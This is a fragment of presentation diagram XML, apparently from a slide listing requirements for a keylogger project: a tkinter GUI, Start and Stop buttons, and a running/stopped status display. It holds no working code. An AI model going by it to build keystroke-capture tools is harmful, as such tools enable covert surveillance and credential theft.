          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F1593AF-3B86-453C-971E-A5709C5A6A39}" type="parTrans" cxnId="{71DBD705-2839-442D-B310-15A8709FFCB4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A11D2D5-4A8F-4414-B315-3B7EF03B8A4D}" type="sibTrans" cxnId="{71DBD705-2839-442D-B310-15A8709FFCB4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17555B28-C959-41A3-AF3F-DE8C8AF52CB1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>Provide a simple GUI using the tkinter library.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1840D8D3-28C9-45CE-8A44-CEB4761F5F28}" type="parTrans" cxnId="{3C443F0C-3222-4F81-B0E3-FB82A96EBD41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C1CCA8F-07AA-440D-A8A4-B20C3E87CC83}" type="sibTrans" cxnId="{3C443F0C-3222-4F81-B0E3-FB82A96EBD41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20FCF9A6-7D24-4220-B35A-D2E49116DE91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>Include "Start" and "Stop" buttons to control the keylogger.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5771A1A-7953-478A-A192-786F517A6902}" type="parTrans" cxnId="{910A054E-6509-4A1A-8F24-4AA9427ED03C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4AA76E-9D15-4E36-8B87-8234DDF8653D}" type="sibTrans" cxnId="{910A054E-6509-4A1A-8F24-4AA9427ED03C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6B71EEC-D880-4100-B878-BD3A0B6FF7B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>Display the status of the keylogger (running or stopped) in the GUI.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9553BAD-2274-4EEC-9E6E-6E42732F8E33}" type="parTrans" cxnId="{3A3B3549-C725-464E-BEB4-909188BA94CF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6B91B7A-C62D-4AB5-814F-D1400CA099A6}" type="sibTrans" cxnId="{3A3B3549-C725-464E-BEB4-909188BA94CF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DEF037C-FCBC-4968-8920-E469C6F74F78}" type="pres">
      <dgm:prSet presAssocID="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{628F9F94-476C-48F1-94BE-EC3D86C96236}" type="pres">
      <dgm:prSet presAssocID="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" presName="fgShape" presStyleLbl="fgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" type="pres">
      <dgm:prSet presAssocID="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" presName="linComp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D434F777-8A96-4906-AE04-DDCDEDF531E5}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C8CB6295-04BE-4EA4-9F6A-BF9482E09C6C}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="imagNode" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="-738" custLinFactNeighborY="232"/>
      <dgm:spPr>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dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{9294B1DA-B631-463F-89D9-B2F519C3513B}" type="pres">
      <dgm:prSet presAssocID="{749D3DA5-0642-44D9-9AFE-5B180B73E639}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{40F76B6B-014D-43CA-ACAB-79F1C2E44FF8}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3BAAE64C-0C0C-436C-B4D1-CB1DBB24D5DB}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}"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63000" r="-63000"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{D504A9FC-FFC3-440F-9C33-7A97BFB08F7A}" type="pres">
      <dgm:prSet presAssocID="{EC732255-80CD-41DF-A38B-22FBD153AD66}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custLinFactNeighborX="2671" custLinFactNeighborY="-685"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82A9693F-7758-426F-A041-276AEE05163C}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{76A8BCAD-F926-456C-847F-7C01C78E402B}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}"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Lst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{71DBD705-2839-442D-B310-15A8709FFCB4}" srcId="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" destId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" srcOrd="2" destOrd="0" parTransId="{8F1593AF-3B86-453C-971E-A5709C5A6A39}" sibTransId="{5A11D2D5-4A8F-4414-B315-3B7EF03B8A4D}"/>
    <dgm:cxn modelId="{580F130A-6794-4E4A-8337-6C12D1982BD1}" type="presOf" srcId="{12AD88A9-497E-481F-8B6D-31CAAD572DC6}" destId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{3C443F0C-3222-4F81-B0E3-FB82A96EBD41}" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{17555B28-C959-41A3-AF3F-DE8C8AF52CB1}" srcOrd="0" destOrd="0" parTransId="{1840D8D3-28C9-45CE-8A44-CEB4761F5F28}" sibTransId="{7C1CCA8F-07AA-440D-A8A4-B20C3E87CC83}"/>
    <dgm:cxn modelId="{4BAD9922-F465-4AC9-8904-A3E2168AB85A}" type="presOf" srcId="{749D3DA5-0642-44D9-9AFE-5B180B73E639}" destId="{9294B1DA-B631-463F-89D9-B2F519C3513B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{B1A92523-857A-42CA-A0FB-6C8CCCE95FE9}" type="presOf" srcId="{C6B71EEC-D880-4100-B878-BD3A0B6FF7B2}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{F1430C24-4E24-4097-A905-287D8915265E}" type="presOf" srcId="{33668DFE-79D4-4705-8FD8-931167E899E4}" destId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{C8AE6530-C5D2-434B-9C3B-289BE5B25144}" srcId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" destId="{7ACBF37F-B181-4B7F-BA67-F1108A286FF2}" srcOrd="1" destOrd="0" parTransId="{1EEAC72C-D380-41A1-BF60-F6267D2F7C2F}" sibTransId="{4EDF53F1-1AAB-4730-8D79-376004E5C59B}"/>
    <dgm:cxn modelId="{04829E30-A5B4-4458-97C4-D4C963E1F8D4}" srcId="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" destId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" srcOrd="0" destOrd="0" parTransId="{2BF4CB66-56A2-4BA5-82D7-38F812236420}" sibTransId="{749D3DA5-0642-44D9-9AFE-5B180B73E639}"/>
    <dgm:cxn modelId="{432E5461-9B81-4218-AA1B-07A47CF5EB37}" srcId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" destId="{12AD88A9-497E-481F-8B6D-31CAAD572DC6}" srcOrd="0" destOrd="0" parTransId="{AA488877-DA8E-4703-9FF8-8686DA823883}" sibTransId="{BAF11084-F91F-454D-95B8-A943052F3EA4}"/>
    <dgm:cxn modelId="{FDD6DC61-7758-4433-8CA6-5077CE045B4C}" type="presOf" srcId="{C6B71EEC-D880-4100-B878-BD3A0B6FF7B2}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{EF28BC45-8BFE-40D0-987D-E8A3521D9FE9}" type="presOf" srcId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" destId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{3A3B3549-C725-464E-BEB4-909188BA94CF}" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{C6B71EEC-D880-4100-B878-BD3A0B6FF7B2}" srcOrd="2" destOrd="0" parTransId="{B9553BAD-2274-4EEC-9E6E-6E42732F8E33}" sibTransId="{B6B91B7A-C62D-4AB5-814F-D1400CA099A6}"/>
    <dgm:cxn modelId="{58E0006E-9EB1-4C66-986B-FAE88D1A6F4A}" type="presOf" srcId="{17555B28-C959-41A3-AF3F-DE8C8AF52CB1}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{910A054E-6509-4A1A-8F24-4AA9427ED03C}" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{20FCF9A6-7D24-4220-B35A-D2E49116DE91}" srcOrd="1" destOrd="0" parTransId="{A5771A1A-7953-478A-A192-786F517A6902}" sibTransId="{CF4AA76E-9D15-4E36-8B87-8234DDF8653D}"/>
    <dgm:cxn modelId="{FD587376-039A-4004-8178-639379497DE5}" type="presOf" srcId="{20FCF9A6-7D24-4220-B35A-D2E49116DE91}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{52A8E777-3038-4171-BA31-ED92FA3C1DA0}" srcId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" destId="{7536AB6E-3BB2-4D1F-A318-0ECDA724FEE2}" srcOrd="1" destOrd="0" parTransId="{A9ED6A5C-EFED-45CA-A84F-1C980075855A}" sibTransId="{5FAD7DE8-FE34-4353-B352-BC90F951BBA0}"/>
    <dgm:cxn modelId="{8D052659-ABA7-48DF-BECE-8C5DFB1D131B}" type="presOf" srcId="{33668DFE-79D4-4705-8FD8-931167E899E4}" destId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{5BE1E97C-BF31-47CB-A03E-7FA7C710B459}" type="presOf" srcId="{EC732255-80CD-41DF-A38B-22FBD153AD66}" destId="{D504A9FC-FFC3-440F-9C33-7A97BFB08F7A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{0FDE3F80-F10C-46AC-8F7B-DAB7C71D68A3}" type="presOf" srcId="{7536AB6E-3BB2-4D1F-A318-0ECDA724FEE2}" destId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{0A039A8D-8895-480F-B158-D26F924ECF20}" type="presOf" srcId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" destId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{F639ED98-22C7-4107-BB42-2E475CFA778F}" type="presOf" srcId="{12AD88A9-497E-481F-8B6D-31CAAD572DC6}" destId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{45252B9A-2653-409B-8210-3E34D411AE86}" type="presOf" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{A983739F-56C2-4130-AACE-8EACD9F63289}" type="presOf" srcId="{7536AB6E-3BB2-4D1F-A318-0ECDA724FEE2}" destId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{FA4E2AAF-5FEA-47E3-9490-2DCAFCA59C7C}" type="presOf" srcId="{7ACBF37F-B181-4B7F-BA67-F1108A286FF2}" destId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{C40515B6-8EE3-4B3D-BD82-5680A19FD302}" type="presOf" srcId="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" destId="{2DEF037C-FCBC-4968-8920-E469C6F74F78}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{0A9F42CB-21DE-4C5E-AAA3-9A01D8BCB6AE}" srcId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" destId="{33668DFE-79D4-4705-8FD8-931167E899E4}" srcOrd="0" destOrd="0" parTransId="{38D3A2B4-0AA3-4C89-AE00-F958CFF699C8}" sibTransId="{74BB7AB8-3877-4006-8ABF-5C4E57D38899}"/>
    <dgm:cxn modelId="{2C894CCB-32D1-472F-A1AD-6E511A74AA67}" srcId="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" destId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" srcOrd="1" destOrd="0" parTransId="{5DE7DF5D-0521-4B52-BC2B-602FB60E5B01}" sibTransId="{EC732255-80CD-41DF-A38B-22FBD153AD66}"/>
    <dgm:cxn modelId="{8CAE00CC-ACCB-4EAF-9C19-2EE07CC9E1FE}" type="presOf" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{8D0E5DCD-CE31-4BDE-9434-1470338329C0}" type="presOf" srcId="{20FCF9A6-7D24-4220-B35A-D2E49116DE91}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{82A253E7-D257-44ED-AF72-C3EF7E61B11E}" type="presOf" srcId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" destId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{5E8481F2-CF37-4885-A180-53C83A51F73C}" type="presOf" srcId="{17555B28-C959-41A3-AF3F-DE8C8AF52CB1}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{A06A3BF7-182A-4302-9805-C545CE393C95}" type="presOf" srcId="{7ACBF37F-B181-4B7F-BA67-F1108A286FF2}" destId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{6110A3FE-825C-4398-A41D-94F59F2B2624}" type="presOf" srcId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" destId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{F181545C-9C7D-4344-86D0-BF690D5B46D2}" type="presParOf" srcId="{2DEF037C-FCBC-4968-8920-E469C6F74F78}" destId="{628F9F94-476C-48F1-94BE-EC3D86C96236}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{A8809FF2-B48B-48D0-89F4-D8C4A413D0CE}" type="presParOf" srcId="{2DEF037C-FCBC-4968-8920-E469C6F74F78}" destId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{00FBE5FF-F9BC-44A0-94E3-DE7D98310850}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{FF2679D4-E575-496F-AC23-163BEBBC7C11}" type="presParOf" srcId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" destId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{E38710A2-DD72-4CD0-8EF1-D2AF68435231}" type="presParOf" srcId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" destId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{20B68BBE-71C8-46FB-A7EE-DB5DAC64B7C7}" type="presParOf" srcId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" destId="{D434F777-8A96-4906-AE04-DDCDEDF531E5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{15AB0564-210B-47E3-97CC-7D7D0519CD6A}" type="presParOf" srcId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" destId="{C8CB6295-04BE-4EA4-9F6A-BF9482E09C6C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{48EDE726-1EE7-4321-8D7A-1F6F5755BC04}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{9294B1DA-B631-463F-89D9-B2F519C3513B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{308674EF-137F-4124-A257-3057945D9516}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{6D56C07F-6C34-497D-A0FB-9C8BFC919C57}" type="presParOf" srcId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" destId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{D93E30DB-61FC-4056-A5EC-FE2EC1476CD6}" type="presParOf" srcId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" destId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{249DB380-6522-4162-86C2-18AD16D04E16}" type="presParOf" srcId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" destId="{40F76B6B-014D-43CA-ACAB-79F1C2E44FF8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{B98180D6-20FB-4A0F-9BD2-E2275914579A}" type="presParOf" srcId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" destId="{3BAAE64C-0C0C-436C-B4D1-CB1DBB24D5DB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{4980EC5C-752E-4ED2-AA3B-1E0B7D353B61}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{D504A9FC-FFC3-440F-9C33-7A97BFB08F7A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{2B5B96CB-3E55-4B20-918D-3DBC72860866}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{22567FA1-853D-4370-850E-F8AA849118BC}" type="presParOf" srcId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{FF94965E-0BB5-4777-BB95-6959DF32F41F}" type="presParOf" srcId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{3596E80F-81DE-42A4-84BC-0BF3E5D27295}" type="presParOf" srcId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" destId="{82A9693F-7758-426F-A041-276AEE05163C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{CDB10CC5-8E20-48A5-9C44-CCBEFC272407}" type="presParOf" srcId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" destId="{76A8BCAD-F926-456C-847F-7C01C78E402B}"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592B9A2-91CA-4167-81C3-2B08981ECB5A}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hList7" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
